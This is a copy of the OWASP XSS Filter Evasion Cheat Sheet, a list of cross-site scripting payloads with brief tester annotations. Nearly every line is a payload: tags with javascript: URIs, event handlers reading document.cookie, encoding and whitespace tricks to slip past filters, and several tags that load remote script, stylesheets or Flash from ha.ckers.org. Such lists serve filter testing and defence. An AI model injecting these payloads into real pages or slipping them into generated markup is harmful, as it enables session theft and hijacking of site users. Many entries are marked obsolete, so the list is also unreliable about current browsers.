Source: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet, based on the RSnake original at http://ha.ckers.org/xss.html. Retrieved on 2013-11-20. Much of this is wildly obsolete.
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
nickg: unable to replicate in Firefox, Safari, or Chrome (2014-01-10)
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
obsolete?
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="/" onerror=javascript:alert('XSS')>
obsolete
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="/x" onerror=javascript:alert('XSS')>
obsolete form
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="/" onerror=javascript:alert('XSS')>
obsolete form
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="/x" onerror="jav ascript:alert('XSS');">
obsolete form
<IMG SRC="/" onerror="jav	ascript:alert('XSS');">
obsolete form
<IMG SRC="jav
ascript:alert('XSS');">
obsolete form
<IMG SRC="/x" onerror="jav
ascript:alert('XSS');">
obsolete form
<IMG SRC="/x" onerror="jav%00ascript:alert('XSS');">
obsolete form
<IMG SRC="/x" onerror="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
N/A
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
Wildly obsolete
<IMG DYNSRC="javascript:alert('XSS')">
Wildly obsolete
<IMG LOWSRC="javascript:alert('XSS')">
likely obsolete
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
Obsolete
<BGSOUND SRC="javascript:alert('XSS');"
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG STYLE="xss:expr/XSS/ession(alert('XSS'))"
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>"Downlevel-hidden block"
Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always">
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>